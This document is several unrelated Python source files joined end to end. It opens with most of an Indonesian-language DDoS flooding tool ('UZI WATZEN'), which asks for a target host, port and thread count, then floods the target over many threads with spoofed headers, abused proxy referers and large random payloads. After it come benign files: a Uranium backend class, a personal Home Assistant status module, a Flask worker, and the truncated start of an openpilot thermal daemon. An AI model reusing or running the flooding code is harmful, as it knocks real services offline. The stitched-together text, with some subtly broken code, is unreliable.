"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
referers = [
'http://help.baidu.com/searchResult?keywords=',
'http://www.bing.com/search?q=',
'http://www.alltheweb.com/help/webmaster/crawler',
'http://gais.cs.ccu.edu.tw/robot.php', 'http://www.googlebot.com/bot.html',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=', 'https://www.fbi.com/',
'http://search.aol.com/aol/search?q=',
'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'https://drive.google.com/viewerng/viewer?url=',
'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'https://replit.com/', 'https://check-host.net/', 'https://obaspro.my.id/',
'http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url='
'http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url='
'http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS',
'http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url='
'http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url=',
'http://growtopiagame.com/', 'http://check-host.net/check-http?url=',
'http://ip2location.com/', 'https://pointblank.com/',
'https://www.ted.com/search?q=',
'https://drive.google.com/viewerng/viewer?url=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=',
'https://play.google.com/store/search?q=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=',
'https://www.cia.gov/index.html', 'https://www.google.ad/search?q=',
'https://www.google.ae/search?q=', 'https://vk.com/profile.php?redirect=',
'https://www.google.ae/search?q=', 'https://www.google.com.af/search?q=',
'https://www.google.com.ag/search?q=',
'https://www.google.com.ai/search?q=', 'https://www.google.al/search?q=',
'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=',
'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
]
acceptall = ["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',
'Your_Server_Bypassed_By_Uzi',]
print("""\033[1;33;40mTUNGGU UZI WATZEN ACCEPT PASSWORD""")
time.sleep(5)
os.system("clear")
print("\033[1;34;40m \n")
os.system("figlet DDOS ATTACK -f slant")
print("\033[1;33;40mJika Anda memiliki masalah, Hubugi Admin Github Nih https://github.com/UziWatzen/GTPS-ATTACK/\n")
print("\033[1;32;40m ==> [ DDOS UZI WATZEN ] <== \n")
test = input()
if test == "n":
exit(0)
print("\033[92m")
print("""
██╗░░░██╗███████╗██╗
██║░░░██║╚════██║██║
██║░░░██║░░███╔═╝██║
██║░░░██║██╔══╝░░██║
╚██████╔╝███████╗██║
░╚═════╝░╚══════╝╚═╝
░██████╗░██████╗░░█████╗░██████╗░███████╗██████╗░
██╔════╝░██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗
██║░░██╗░██████╔╝███████║██████╦╝█████╗░░██████╔╝
██║░░╚██╗██╔══██╗██╔══██║██╔══██╗██╔══╝░░██╔══██╗
╚██████╔╝██║░░██║██║░░██║██████╦╝███████╗██║░░██║
░╚═════╝░╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝
""")
print("\033[95m")
print("""
•JANGAN BANYAK BANYAK PAKETNYA ENTAR DOWN|•
|UZI WATZEN : DEVELOPER | ABUSE BLACKLIST |""")
print("\033[95m━━━[+] Masukan Nama Anda")
name = str(input("┗━━━━━━>\033[0m:"))
print("\033[44m━━━[+] Masukan Ip/Host")
ip = str(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Port")
port = int(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Jumlah Packet")
times = int(input("┗━━━━━━>\033[0m:"))
time.sleep(1)
print("\033[44m━━━[+] Masukan Jumlah Threads")
threads = int(input("┗━━━━━━>\033[0m:"))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Ddos():
get_host = "GET HTTP/1.1\r\nHost: " + ip + "\r\n"
post_host = "POST HTTP/1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n" + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: 1\r\n"
forwards = "Client-IP: " + ip + "\r\n"
accept = random.choice(acceptall) + "\r\n"
mozila = "User-Agent: " + random.choice(accept) + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
header = post_host + get_host + referer + mozila + forward + content + connection + length + "\r\n\r\n"
randomip = str(random.randint(1, 255)) + "." + str(random.randint(0, 255)) + "." + str(random.randint(0, 255)) + "." + str(
random.randint(0, 255)) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
request = post_host + get_host + forward + connection + mozila + forwards + header + useragent + accept + length + randomip + referer + content + "\r\n"
data = random._urandom(494949)
def Ddos():
get_data = "GET https://check-host.net//1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
accept = random.choice(acceptall)
Mozila = "User-Agent: " + random.choice(accept) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
connection = "Connection: Shutdown\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: " + ip + "\r\n"
forwards = "Client-IP: " + ip + "\r\n"
header = get_data + referer + forward + useragent + accept + content + connection + length + Mozila + "\r\n\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
request = get_data + forward + connection + useragent + forwards + header + length + randomip + referer + content + accept + Mozila + "\r\n"
data = random._urandom(494949)
def Ddos():
get_host = "GET /growtopia/server_data.php HTTP/1.1\r\nHost: " + ip + "\r\n"
get_data = "GET https://check-host.net//1.1\r\nHost: " + ip + "\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
accept = random.choice(acceptall)
Mozila = "User-Agent: " + random.choice(accept) + "\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
connection = "Connection: Shutdown\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
length = "Content-Length: 0\r\n"
forward = "X-Forwarded-For: " + ip + "\r\n"
forwards = "Client-IP: " + ip + "\r\n"
header = get_host + referer + forward + useragent + accept + content + connection + length + Mozila + "\r\n\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
request = get_host + forward + get_data + connection + useragent + forwards + header + length + randomip + referer + content + accept + Mozila + "\r\n"
data = random._urandom(494949)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
s.send(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(600000):
s.send(data)
s.send(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip,port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(600000):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print(i +"\033[1;32;40m[+]Send Packet To ==> ",ip," Port ==> ",port,"!!!")
except :
s.close()
print("\033[1;32;40m[+] Send Packet To ==> ",ip," Port ==> ",port,"!!!")
def Keluar():
clear()
os.system("figlet Anda Meninggalkan Tuan -f miring")
sys.exit(130)
def exit_gracefully(signum, frame):
# mengembalikan Ping Server Orang
signal.signal(signal.SIGINT, original_sigint)
try:
exitc = str(input(" Anda ingin keluar dari Prmakaian Tools?:"))
if exitc == 'y':
Keluar()
except KeyboardInterrupt:
print("Ok ok")
Keluar()
# kembalikan handler keluar yang Dimatikan
signal.signal(signal.SIGINT, exit_gracefully)
if __name__ == '__main__':
# Untuk Menyimpan Sinyal Server
original_sigint = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, exit_gracefully)
for y in range(threads):
th = threading.Thread(target = Ddos)
th.start()
for x in range(threads):
th = threading.Thread(target = Ddos)
th.start()
for y in range(threads):
th = threading.Thread(target = Ddos)
th.start()
|
Backend.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from enum import IntEnum
import struct
import subprocess
import sys
import threading
from time import sleep
from typing import Any, Dict, Optional
from UM.Backend.SignalSocket import SignalSocket
from UM.Logger import Logger
from UM.Signal import Signal, signalemitter
import UM.Application
from UM.PluginObject import PluginObject
from UM.Platform import Platform
import Arcus
## The current processing state of the backend.
class BackendState(IntEnum):
NotStarted = 1
Processing = 2
Done = 3
Error = 4
Disabled = 5
## Base class for any backend communication (separate piece of software).
# It makes use of the Socket class from libArcus for the actual communication bits.
# The message_handlers dict should be filled with string (full name of proto message), function pairs.
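#
#  A minimal, hypothetical sketch of how a subclass is expected to wire this up
#  (the message type name and handler below are illustrative, not part of Uranium's API):
#
#      class MyBackend(Backend):
#          def __init__(self):
#              super().__init__()
#              self._message_handlers["my.proto.SlicingProgress"] = self._onProgress
#
#          def _onProgress(self, message):
#              self.processingProgress.emit(message.amount)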
@signalemitter
class Backend(PluginObject):
def __init__(self):
super().__init__() # Call super to make multiple inheritance work.
self._supported_commands = {}
self._message_handlers = {}
self._socket = None
self._port = 49674
self._process = None # type: Optional[subprocess.Popen]
self._backend_log = []
self._backend_log_max_lines = None
self._backend_state = BackendState.NotStarted
UM.Application.Application.getInstance().callLater(self._createSocket)
processingProgress = Signal()
backendStateChange = Signal()
backendConnected = Signal()
backendQuit = Signal()
def setState(self, new_state):
if new_state != self._backend_state:
self._backend_state = new_state
self.backendStateChange.emit(self._backend_state)
## \brief Start the backend / engine.
# Runs the engine, this is only called when the socket is fully opened & ready to accept connections
def startEngine(self):
command = self.getEngineCommand()
if not command:
self._createSocket()
return
if not self._backend_log_max_lines:
self._backend_log = []
# Double check that the old process is indeed killed.
if self._process is not None:
self._process.terminate()
Logger.log("d", "Engine process is killed. Received return code %s", self._process.wait())
self._process = self._runEngineProcess(command)
if self._process is None: # Failed to start engine.
return
Logger.log("i", "Started engine process: %s", self.getEngineCommand()[0])
self._backendLog(bytes("Calling engine with: %s\n" % self.getEngineCommand(), "utf-8"))
t = threading.Thread(target = self._storeOutputToLogThread, args = (self._process.stdout,), name = "EngineOutputThread")
t.daemon = True
t.start()
t = threading.Thread(target = self._storeStderrToLogThread, args = (self._process.stderr,), name = "EngineErrorThread")
t.daemon = True
t.start()
def close(self):
if self._socket:
while self._socket.getState() == Arcus.SocketState.Opening:
sleep(0.1)
self._socket.close()
def _backendLog(self, line):
try:
line_str = line.decode("utf-8")
except UnicodeDecodeError:
line_str = line.decode("latin1") #Latin-1 as a fallback since it can never give decoding errors. All characters are 1 byte.
Logger.log("d", "[Backend] " + line_str.strip())
self._backend_log.append(line)
## Get the logging messages of the backend connection.
    #   \returns The backend log, as a list of raw (bytes) log lines.
def getLog(self):
if self._backend_log_max_lines and type(self._backend_log_max_lines) == int:
while len(self._backend_log) >= self._backend_log_max_lines:
del(self._backend_log[0])
return self._backend_log
## Get the command used to start the backend executable
def getEngineCommand(self):
return [UM.Application.Application.getInstance().getPreferences().getValue("backend/location"), "--port", str(self._socket.getPort())]
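    # With default settings this typically evaluates to something like
    # ["/path/to/engine", "--port", "49674"], where the executable path comes from the
    # "backend/location" preference (the path shown here is hypothetical).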
## Start the (external) backend process.
def _runEngineProcess(self, command_list) -> Optional[subprocess.Popen]:
kwargs = {} #type: Dict[str, Any]
if sys.platform == "win32":
su = subprocess.STARTUPINFO()
su.dwFlags |= subprocess.STARTF_USESHOWWINDOW
su.wShowWindow = subprocess.SW_HIDE
kwargs["startupinfo"] = su
kwargs["creationflags"] = 0x00004000 # BELOW_NORMAL_PRIORITY_CLASS
try:
return subprocess.Popen(command_list, stdin = subprocess.DEVNULL, stdout = subprocess.PIPE, stderr = subprocess.PIPE, **kwargs)
except PermissionError:
Logger.log("e", "Couldn't start back-end: No permission to execute process.")
except FileNotFoundError:
Logger.logException("e", "Unable to find backend executable: %s", command_list[0])
except BlockingIOError:
Logger.log("e", "Couldn't start back-end: Resource is temporarily unavailable")
return None
def _storeOutputToLogThread(self, handle):
while True:
try:
line = handle.readline()
except OSError:
Logger.logException("w", "Exception handling stdout log from backend.")
continue
if line == b"":
self.backendQuit.emit()
break
self._backendLog(line)
def _storeStderrToLogThread(self, handle):
while True:
try:
line = handle.readline()
except OSError:
Logger.logException("w", "Exception handling stderr log from backend.")
continue
if line == b"":
break
#self._backendLog(line)
## Private socket state changed handler.
def _onSocketStateChanged(self, state):
self._logSocketState(state)
if state == Arcus.SocketState.Listening:
if not UM.Application.Application.getInstance().getUseExternalBackend():
self.startEngine()
elif state == Arcus.SocketState.Connected:
Logger.log("d", "Backend connected on port %s", self._port)
self.backendConnected.emit()
## Debug function created to provide more info for CURA-2127
def _logSocketState(self, state):
if state == Arcus.SocketState.Listening:
Logger.log("d", "Socket state changed to Listening")
elif state == Arcus.SocketState.Connecting:
Logger.log("d", "Socket state changed to Connecting")
elif state == Arcus.SocketState.Connected:
Logger.log("d", "Socket state changed to Connected")
elif state == Arcus.SocketState.Error:
Logger.log("d", "Socket state changed to Error")
elif state == Arcus.SocketState.Closing:
Logger.log("d", "Socket state changed to Closing")
elif state == Arcus.SocketState.Closed:
Logger.log("d", "Socket state changed to Closed")
## Private message handler
def _onMessageReceived(self):
message = self._socket.takeNextMessage()
if message.getTypeName() not in self._message_handlers:
Logger.log("e", "No handler defined for message of type %s", message.getTypeName())
return
self._message_handlers[message.getTypeName()](message)
## Private socket error handler
def _onSocketError(self, error):
if error.getErrorCode() == Arcus.ErrorCode.BindFailedError:
self._port += 1
Logger.log("d", "Socket was unable to bind to port, increasing port number to %s", self._port)
elif error.getErrorCode() == Arcus.ErrorCode.ConnectionResetError:
Logger.log("i", "Backend crashed or closed.")
elif error.getErrorCode() == Arcus.ErrorCode.Debug:
Logger.log("d", "Socket debug: %s", str(error))
return
else:
Logger.log("w", "Unhandled socket error %s", str(error))
self._createSocket()
## Creates a socket and attaches listeners.
def _createSocket(self, protocol_file):
if self._socket:
Logger.log("d", "Previous socket existed. Closing that first.") # temp debug logging
self._socket.stateChanged.disconnect(self._onSocketStateChanged)
self._socket.messageReceived.disconnect(self._onMessageReceived)
self._socket.error.disconnect(self._onSocketError)
# Hack for (at least) Linux. If the socket is connecting, the close will deadlock.
while self._socket.getState() == Arcus.SocketState.Opening:
sleep(0.1)
            # If the error occurred due to parsing, both sides still believe that the connection is okay.
# So we need to force a close.
self._socket.close()
self._socket = SignalSocket()
self._socket.stateChanged.connect(self._onSocketStateChanged)
self._socket.messageReceived.connect(self._onMessageReceived)
self._socket.error.connect(self._onSocketError)
if Platform.isWindows():
# On Windows, the Protobuf DiskSourceTree does stupid things with paths.
# So convert to forward slashes here so it finds the proto file properly.
            # Using sys.getfilesystemencoding() avoids the application crashing if it is
            # installed on a path with non-ASCII characters (GitHub issue #3907).
protocol_file = protocol_file.replace("\\", "/").encode(sys.getfilesystemencoding())
if not self._socket.registerAllMessageTypes(protocol_file):
Logger.log("e", "Could not register Uranium protocol messages: %s", self._socket.getLastError())
if UM.Application.Application.getInstance().getUseExternalBackend():
Logger.log("i", "Listening for backend connections on %s", self._port)
self._socket.listen("127.0.0.1", self._port)
|
homeassistant.py
|
import http.client
import json
import time
from typing import Any, Dict, Optional, Tuple
from threading import Thread
from bitwarden import BitwardenPassword
from i3pystatus import IntervalModule
import color
def request(path: str,
token: str,
data: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
conn = http.client.HTTPSConnection("hass.thalheim.io")
headers = {
"Authorization": f"Bearer {token}",
"content-type": "application/json",
}
method = "GET"
body = None
if data:
body = json.dumps(data)
method = "POST"
conn.request(method, path, headers=headers, body=body)
resp = conn.getresponse().read()
return json.loads(resp.decode("utf-8"))
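# Illustrative usage against the Home Assistant REST API (the entity id is hypothetical;
# a valid long-lived access token is required):
#   states = request("/api/states", token)                          # GET: list all entity states
#   request("/api/services/light/turn_on", token,
#           data={"entity_id": "light.kitchen"})                    # POST: call a service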
class State:
def __init__(self, password: BitwardenPassword):
self.entities: Optional[Dict[str, Any]] = None
self.password = password
thread = Thread(target=self.update_state)
thread.daemon = True
thread.start()
def update_state(self):
while True:
try:
self.update()
except Exception:
pass
time.sleep(30)
def update(self):
resp = request("/api/states", self.password.get())
entities = {}
for entity in resp:
entities[entity["entity_id"]] = entity
self.entities = entities
def get(self, entity_id: str) -> Optional[Dict[str, Any]]:
while self.entities is None:
time.sleep(1)
return self.entities.get(entity_id)
state = State(BitwardenPassword("home-assistant-token"))
# class WeatherIcon(IntervalModule):
# @require(internet)
# def run(self) -> None:
# global state
# weather = state.get("weather.openweathermap")
# if weather is None:
# return
# text = f"{weather['attributes']['temperature']}°C"
# #icon_name = weather['attributes']['icon']
# #icon = WEATHER_ICONS.get(icon_name, None)
# #if icon is None:
# # text = f'<span color="white">{icon_name}</span>'
# #else:
# # text = f'<span font_size="xx-large" color="white">{icon}</span>'
# self.output = dict(full_text=text,
#                            markup="pango",
# separator=False,
# separator_block_width=5)
class WeatherText(IntervalModule):
def run(self) -> None:
weather = state.get("weather.openweathermap")
if weather is None:
return
air_quality = state.get("sensor.bme680_air_quality")
temperature = state.get("sensor.bme680_temperature")
text = f"{weather['attributes']['temperature']}°C (inside: {temperature['state']}°C/air: {air_quality['state']}%)"
self.output = dict(full_text=text)
class Shannan(IntervalModule):
def run(self) -> None:
shannan = state.get("person.shannan_lekwati")
distance = state.get("sensor.shannan_joerg_distance")
locations = {
"not_home": "Away",
"Work of Shannan": "Work",
"Shannan's Home": "Home",
}
if shannan is None or distance is None:
return
location = locations.get(shannan['state'], shannan['state'])
self.output = dict(full_text=f"{location} ({distance['state']}km)")
status_symbols = {"off": "-", "on": "+", "FULL": "↯"}
def charge_state(level: int, state: str) -> Tuple[str, bool]:
if level == 100:
status = status_symbols["FULL"]
elif state in ["discharging", "NotCharging"]:
status = status_symbols["off"]
else:
status = status_symbols["on"]
return f"{status}{level}%", level < 40
def charge_state_android(state: State, device: str) -> Tuple[str, bool]:
battery_level = state.get(f"sensor.{device}_battery_level")
battery_state = state.get(f"sensor.{device}_battery_state")
if battery_level == "unknown" or battery_level is None or battery_state is None:
return "N/A", False
return charge_state(int(battery_level["state"]), battery_state["state"])
def charge_state_ios(state: State, device: str) -> Tuple[str, bool]:
battery = state.get(f"sensor.{device}_battery_state")
if battery is None or "battery" not in battery["attributes"]:
return "N/A", False
return charge_state(battery["attributes"]["battery"],
battery["attributes"]["battery_status"])
class PhoneBattery(IntervalModule):
hints = dict(markup=True)
def run(self) -> None:
redmi = charge_state_android(state, "redmi_note_5")
iphone = charge_state_ios(state, "beatrice_icloud")
watch = charge_state_ios(state, "shannans_apple_watch")
herbert = charge_state_ios(state, "herbert")
full_text = f"{redmi[0]} I:{iphone[0]} W:{watch[0]} H:{herbert[0]}"
critical = redmi[1] or iphone[1] or watch[1] or herbert[1]
text_color = color.text_down if critical else None
self.output = dict(full_text=full_text, color=text_color)
|
cfworker.py
|
#!/usr/bin/python
import flask
import multiprocessing, os
class cfworker:
    """Runs a Flask app in a child process so it can be started and stopped on demand."""

    def __init__(self, port=None):
        self.app = flask.Flask(__name__)
        self.server = None
        self.port = port
        if not self.port:
            # Fall back to the PORT environment variable; raises KeyError if it is not set.
            self.port = int(os.environ['PORT'])

    def run(self):
        # Target of the worker process: serve the Flask app on all interfaces.
        self.app.run(host='0.0.0.0', port=self.port)

    def start(self):
        # Stop any previous worker first; a multiprocessing.Process can only be started once.
        self.stop()
        self.server = multiprocessing.Process(target=self.run)
        self.server.start()

    def stop(self):
        if self.server is not None and self.server.is_alive():
            self.server.terminate()
            self.server.join()
        self.server = None
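# Minimal usage sketch (assumes an explicit port or a PORT environment variable):
#   worker = cfworker(port=5000)
#   worker.start()   # serves the Flask app from a child process
#   ...
#   worker.stop()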
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from system.hardware import HARDWARE, TICI, AGNOS
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from system.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from system.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 1.5 * DT_TRML) # 1.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
